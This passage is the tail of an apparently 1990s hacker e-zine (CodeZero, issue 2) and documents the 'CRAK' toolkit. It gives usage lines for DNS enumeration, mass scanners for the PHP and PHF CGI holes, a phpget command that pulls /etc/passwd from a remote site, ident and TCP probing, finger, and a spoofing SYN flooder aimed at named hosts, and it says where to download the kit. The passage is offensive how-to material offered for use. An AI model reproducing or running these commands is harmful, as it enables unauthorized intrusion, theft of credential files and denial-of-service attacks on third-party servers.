  2407.  
  2408. then it will be copied into /crak, depending on the working directory..
  2409.  
  2410.  
  2411. DNSscan :
  2412. ---------
  2413.  
  2414.   Usage: dnscan [-file <filename>] [-domain <domain>] [-sub <subdomain>]
  2415.  
  2416.   -file           Usages <filename> as a list of subdomains and servers to scan.
  2417.   -domain         Lists all servers in a first level domain like com or net.
  2418.   -subdomain      Lists all servers in a domain.
  2419.  
  2420.   The -domain mode will first create a file called 'domain.<domain>' with a
  2421.   list of all subdomains and their name servers, and then use that file in
  2422.   the -file mode.
  2423.  
  2424.   The input file needs to have the following format:
  2425.  
  2426.   <domain> <subdomain> [<dns>]
  2427.  
  2428.   To list all servers in Japan, do "dnscan -domain jp"
  2429.   To list all servers in the netcom domain, do "dnscan -sub netcom.com"
  2430.  
  2431. PHPscan :
  2432. ---------
  2433.  
  2434.   phpscan <infile> <outfile>
  2435.  
  2436.   eg.
  2437.  
  2438.   phpscan domains.txt phpvunerable.txt
  2439.  
  2440.  
  2441. PHPget :
  2442. --------
  2443.  
  2444.   phpget <domain> <path and file>
  2445.  
  2446.   eg.
  2447.  
  2448.   phpget www.p1.com /etc/passwd
  2449.  
  2450.  
  2451. PHFscan :
  2452. ---------
  2453.  
  2454.   phfscan <infile> <outfile>
  2455.  
  2456.   eg.
  2457.  
  2458.   phfscan domains.txt phfvunerable.txt
  2459.  
  2460. Ident-Scan :
  2461. ------------
  2462.  
  2463.    ident-scan <host> [low port] [high port]
  2464.  
  2465.    eg.
  2466.  
  2467.    ident-scan warped.arc.nasa.gov 1 9999
  2468.  
  2469. TCPprobe :
  2470. ----------
  2471.  
  2472.   tcpprobe <host>
  2473.  
  2474.   eg.
  2475.  
  2476.   tcpprobe microsoft.com
  2477.  
  2478. Fingah :
  2479. --------
  2480.  
  2481.   fingah <domain> <user>
  2482.  
  2483.   eg.
  2484.  
  2485.   fingah www.p1.com root
  2486.  
  2487. Synk4 :
  2488. -------
  2489.  
  2490.   synk4 <source ip / address> <target host> <low port> <high port>
  2491.  
  2492.   if you use 0 as the source address, its puts the syn flooder into random
  2493.   ip mode, where the packets are sent from many different random sites.
  2494.  
  2495.   eg.
  2496.  
  2497.   synk4 0 fucked.com 1 23
  2498.  
  2499. Have Phun!@#
  2500.  
  2501. ===============================================================================
  2502.   Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com
  2503. ===============================================================================
  2504.  
  2505. It can be unzipped with WinZip if you are in W1nd0ze too.. :)
  2506.  
  2507. ───────────────────────────────────────────────────────────────────────────────
  2508. ===============================================================================
  2509. ==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
  2510. ===============================================================================
  2511. ───────────────────────────────────────────────────────────────────────────────
  2512.  
  2513.     Well, that was issue 2, hope ya'll liked it, don't forget to visit...
  2514.                 AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!! 
  2515.  
  2516. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  2517. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  2518. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  2519.  
  2520.      Until next time, when there will be 900 days until the year 2000...
  2521.  
  2522.                                 The CodeZero.
  2523.  
  2524. ===============================================================================
  2525. =====================>  http://www.codez.com NOW UP!@#*  <=====================
  2526. ===============================================================================
  2527.  
  2528. ───────────────────────────────────────────────────────────────────────────────
  2529.           Remember, McDonalds Owns You, And Ronald Is The KinG!!!
  2530.          Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
  2531. ───────────────────────────────────────────────────────────────────────────────
  2532.